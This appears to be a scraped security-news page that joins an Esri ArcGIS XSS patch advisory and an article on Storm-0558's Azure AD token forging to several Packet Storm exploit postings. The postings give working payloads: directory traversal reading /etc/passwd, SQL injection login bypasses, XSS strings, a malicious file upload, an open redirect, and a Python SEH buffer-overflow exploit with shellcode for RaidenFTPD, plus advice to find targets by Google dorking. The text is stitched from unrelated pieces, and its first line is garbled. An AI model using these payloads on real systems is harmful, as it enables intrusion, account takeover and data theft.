
There is a Cross-site Scripting vulnerability in ArcGIS Server in versions 10.8.1 – 11.1 that may allow a remote, authenticated attacker to create a crafted link which onmouseover wont execute but could potentially render an image in the victims browser.  The privileges required to execute this attack are high.





**ArcGIS Server Security 2023 Update 1 Patch** is now available. This patch contains fixes for multiple medium priority security issues. Esri highly recommends customers using ArcGIS Server 11.1 through 10.8.1 to install this patch. Users at version 10.7.1 should upgrade to 10.9.1 or 11.1 and install this patch. ArcGIS 10.7.1 is in mature support status and no longer receives patches. Users working with ArcGIS Enterprise 10.7.1 and below are encouraged to upgrade to versions 11.1 (preferred), 10.9.1 or 10.8.1 and install available security patches.

This patch was released on June 28, 2023 and is available _here_.

We provide Common Vulnerability Scoring System v.3.1 (CVSS) scores to allow our customers to better assess risk of these vulnerabilities to their operations.  Both base and modified temporal scores are provided to reflect the availability of an official patch.

**Vulnerabilities fixed by this patch.**

1.  **BUG-000154070 Stored XSS issue in the ArcGIS REST Services directory**

*   CVE Details: CVE-2023-25840
*   CWE-79 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
*   CVSSv3.1 Base Score: 5.4 (Moderate) CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/
*   CVSSv3.1 Environmentally Modified Score: 5.2 (Moderate) CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/RL:O

Description: There is a stored Cross-site Scripting vulnerability in Esri ArcGIS Server versions 10.8.1 – 11.0 on Windows and Linux platforms that may allow a remote, authenticated attacker to create crafted content which when clicked could potentially execute arbitrary JavaScript code in the victim’s browser. The privileges required to execute this attack are low.

Mitigation: Disable the ArcGIS Server REST Services Directory.

1.  **BUG-000158075 – Stored XSS issue in ArcGIS Server**

*   CVE Details: CVE-2023-25841
*   CWE-79 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
*   CVSSv3.1 Base Score: 6.1 (Medium) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
*   CVSSv3.1 Environmentally Modified Score: 5.2 (Medium) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/RL:O/MPR:L

Description: There is a stored Cross-site Scripting vulnerability in Esri ArcGIS Server versions 10.8.1 – 11.0 on Windows and Linux platforms that may allow a remote, unauthenticated attacker to create crafted content which when clicked could potentially execute arbitrary JavaScript code in the victim’s browser.

Mitigation: Disable anonymous access to ArcGIS Feature services with edit capabilities.

CVE-2023-25840: ArcGIS Server Security 2023 Update 1 Patch available!

The recent attack against Microsoft's email infrastructure by a Chinese nation-state actor referred to as Storm-0558 is said to have a broader scope than previously thought.
According to cloud security company Wiz, the inactive Microsoft account (MSA) consumer signing key used to forge Azure Active Directory (Azure AD or AAD) tokens to gain illicit access to Outlook Web Access (OWA) and

Email Security / Cyber Attack

The recent attack against Microsoft's email infrastructure by a Chinese nation-state actor referred to as Storm-0558 is said to have a broader scope than previously thought.

According to cloud security company Wiz, the inactive Microsoft account (MSA) consumer signing key used to forge Azure Active Directory (Azure AD or AAD) tokens to gain illicit access to Outlook Web Access (OWA) and Outlook.com could also have allowed the adversary to forge access tokens for various types of Azure AD applications.

This includes every application that supports personal account authentication, such as OneDrive, SharePoint, and Teams; customers applications that support the "Login with Microsoft functionality," and multi-tenant applications in certain conditions.

"Everything in the world of Microsoft leverages Azure Active Directory auth tokens for access," Ami Luttwak, chief technology officer and co-founder of Wiz, said in a statement. "An attacker with an AAD signing key is the most powerful attacker you can imagine, because they can access almost any app – as any user. This is a 'shape shifter' superpower."

Microsoft, last week, disclosed the token forging technique was exploited by Storm-0558 to extract unclassified data from victim mailboxes, but the exact contours of the cyber espionage campaign remains unknown.

The Windows maker said it's still investigating as to how the adversary managed to acquire the MSA consumer signing key. But it's unclear if the key functioned as a master key of sorts to unlock access to data belonging to nearly two dozen organizations.

Wiz's analysis fills in some of the blanks, with the company discovering that "all Azure personal account v2.0 applications depend on a list of 8 public keys, and all Azure multi-tenant v2.0 applications with Microsoft account enabled depend on a list of 7 public keys."

It further found that Microsoft replaced one of the the listed public keys (thumbprint: "d4b4cccda9228624656bff33d8110955779632aa") that had been present since at least 2016 sometime between June 27, 2023, and July 5, 2023, around the same period the company said it had revoked the MSA key.

"This led us to believe that although the compromised key acquired by Storm-0558 was a private key designed for Microsoft's MSA tenant in Azure, it was also able to sign OpenID v2.0 tokens for multiple types of Azure Active Directory applications," Wiz said.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

"Storm-0558 seemingly managed to obtain access to one of several keys that were intended for signing and verifying AAD access tokens. The compromised key was trusted to sign any OpenID v2.0 access token for personal accounts and mixed-audience (multi-tenant or personal account) AAD applications."

This effectively means that it could theoretically enable malicious actors to forge access tokens for consumption by any application that depends on the Azure identity platform.

Even worse, the acquired private key could have been weaponized to forge tokens to authenticate as any user to an affected application that trusts Microsoft OpenID v2.0 mixed audience and personal-accounts certificates.

"Identity provider's signing keys are probably the most powerful secrets in the modern world," Wiz security researcher Shir Tamari said. "With identity provider keys, one can gain immediate single hop access to everything, any email box, file service, or cloud account."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Azure AD Token Forging Technique in Microsoft Attack Extends Beyond Outlook, Wiz Reports

WordPress Page Builder KingComposer plugin version 2.9.5 suffers from an open redirection vulnerability.

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.9.5 Open Redirect Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/[+] https://example.com/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WordPress Page Builder KingComposer 2.9.5 Open Redirection

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

Posted Jul 21, 2023

Authored by indoushka

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 5725a62c968e651e09b1218973491c6cf875301d455e111d6a9f075de9cbe5f8

Download | Favorite | View

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - ChurcHope Responsive Themes 4.7.x Directory Traversal Vulnerability                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://themeforest.net/item/churchope-responsive-wordpress-theme/2708562                                           |  | # Dork      : "/wp-content/themes/churchope/lib/"                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwd[+] http://127.0.0.1/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwdGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal

CMS-Bank Mellat Payment Manager version 1.0.0 suffers from a cross site scripting vulnerability.

====================================================================================================================================  
| # Title     : CMS-Bank Mellat Payment Manager v1.0.0 Xss Vulnerability                                                           |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.2 (64 bits)                                          |   
| # Vendor    : https://github.com/                                                                                                |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine. 

[+] Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code   
   (usually in the form of Javascript) to another user.   
    Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context   
  allowing the attacker to access any cookies or session tokens retained by the browser. 

  [+] Affected items : 

    /bank/default.php   
   /bank/index.php 

   [+] The impact of this vulnerability :

   Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data   
   from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify   
   the content of the page presented to the user. 

[+] How to fix this vulnerability :

   Your script should filter metacharacters from user input.  
   Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code   
   (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not,  
   it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. 

[+] Attack details :

    URL encoded POST input PayAdditionalData was set to 01/01/1967" onmouseover=prompt(940051) bad="  
    The input is reflected inside a tag parameter between double quotes.

   URL encoded POST input PayAmount was set to 1" onmouseover=prompt(911818) bad="  
   The input is reflected inside a tag parameter between double quotes.

   URL encoded POST input pay_from was set to 1" onmouseover=prompt(965239) bad="  
   The input is reflected inside a tag parameter between double quotes.

   URL encoded POST input pay_from1 was set to 1" onmouseover=prompt(951829) bad="  
   The input is reflected inside a tag parameter between double quotes.

   Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh   |          
=======================================================================================================================================

CMS-Bank Mellat Payment Manager 1.0.0 Cross Site Scripting

RaidenFTPD version 2.4.4005 suffers from a buffer overflow vulnerability.

    # Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)# Date: 18/07/2023# Exploit Author: Andre Nogueira# Vendor Homepage: https://www.raidenftpd.com/en/# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe# Version: RaidenFTPD 2.4.4005# Tested on: Microsoft Windows 10 Build 19045# 1.- Open RaidenFTPD# 2.- Click on 'Setup' -> 'Step by step setup wizard'# 3.- Run python code: exploit-raidenftpd.py# 4.- Paste the content of exploit-raiden.txt into the field 'Server name'# 5.- Click 'next' -> 'next' -> 'ok'# 6.- Pop calc.exe#!/usr/bin/env python3from struct import packcrash = 2000offset = 497# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d" shellcode =  b"\x90" * 8shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytesSEH = pack("<L", 0x7c1e76ff) #  pop eax; pop esi; ret; => msvcp70.dllbuffer = b"A" * offsetbuffer += nSEHbuffer += SEHbuffer += shellcodebuffer += b"D" * (crash -len(buffer))file_payload = open("exploit-raiden.txt", 'wb')print("[*] Creating the .txt file for out payload")file_payload.write(buffer)print("[*] Writing malicious payload to the .txt file")file_payload.close()

RaidenFTPD 2.4.4005 Buffer Overflow

CMS TSS-EST version 1.0.0 from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : CMS TSS-EST V1.0.0 auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://p30vel.ir/                                                                                                 || # Dork      : Powered by: TSS-EST.COM                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use Payload :  user & pass : ADMIN' OR 1=1#[+] http://127.0.0.1/tishreen-uhledusy/cms/ Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS TSS-EST 1.0.0 SQL Injection

Foody Friend version 1.0 suffers from an arbitrary file upload vulnerability that can assist in cross site scripting attacks.

    # Exploit Title: Foody Friend 1.0 - Arbitrary File Upload# Exploit Author: CraCkEr# Date: 12/07/2023# Vendor: Bug Finder# Vendor Homepage: https://bugfinder.net/# Software Link: https://bugfinder.net/product/foody-friend-a-saas-based-web-app-food-ordering-bot-for-telegram-and-messenger/25# Tested on: Windows 10 Pro# Impact: Allows User to upload files to the web server## DescriptionAllows Attacker to upload malicious files onto the server, such as Stored XSS## Steps to Reproduce:1. Login as [Normal User]2. In [User Dashboard] go to [Edit profile]3. Choose profile picture & Upload any Image & Click on [Save Changes]4. Catch the POST Request with [Burp Proxy Intercept]5. Inject your [Stored XSS] POST /user/profile HTTP/2-----------------------------------------------------------Content-Disposition: form-data; name="profile_picture"; filename="XSS.png"Content-Type: image/png<script>alert(1)</script>-----------------------------------------------------------6. Send the Request7. Right Click on Your Profile Picture [Copy the Path of the Image]8. Access your Uploded Evil file on this Path: https://website/assets/upload/userProfile/[Stored-XSS][-] Done

Foody Friend 1.0 Arbitrary File Upload / Cross Site Scripting

CMS Supported IRF-TH version 2.0.6 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMS Supported IRF-TH v2.0.6 XSS Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.euroyouth.org.ua                                                                                        |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use payload in search box : <script>alert(/indoushka/);</script>[+] http://127.0.0.1/euroyouthorgua/en/search.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS Supported IRF-TH 2.0.6 Cross Site Scripting

Wifi Soft Unibox Administration versions 3.0 and 3.1 suffer from a remote SQL injection vulnerability.

    # Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"# Date: 07/2023# Exploit Author: Ansh Jain @sudoark# Author  Contact : arkinux01@gmail.com# Vendor Homepage: https://www.wifi-soft.com/# Software Link:https://www.wifi-soft.com/products/unibox-hotspot-controller.php# Version: Unibox Administration 3.0 & 3.1# Tested on: Microsoft Windows 11# CVE : CVE-2023-34635# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable toSQL Injection, which can lead to unauthorised admin access for attackers.The vulnerability occurs because of not validating or sanitising the userinput in the username field of the login page and directly sending theinput to the backend server and database.## How to ReproduceStep 1 : Visit the login page and check the version, whether it is 3.0,3.1, or not.Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field andenter any random password.Step 3 : Fill in the captcha and hit login. After hitting login, you havebeen successfully logged in as an administrator and can see anyone's userdata, modify data, revoke access, etc.--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Request-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameters: username, password, captcha, action-----------------------------------------------------------------------------------------------------------------------POST /index.php HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 83Origin: https://255.255.255.255.host.comReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersusername='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 302 FoundServer: nginxDate: Tue, 18 Jul 2023 13:32:14 GMTContent-Type: text/html; charset=UTF-8Location: ./dashboard/dashboardExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Request--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------GET /dashboard/dashboard HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 200 OKServer: nginxDate: Tue, 18 Jul 2023 13:32:43 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheCache_control: private<!DOCTYPE html><html lang="en">html content</html>

Tag

#windows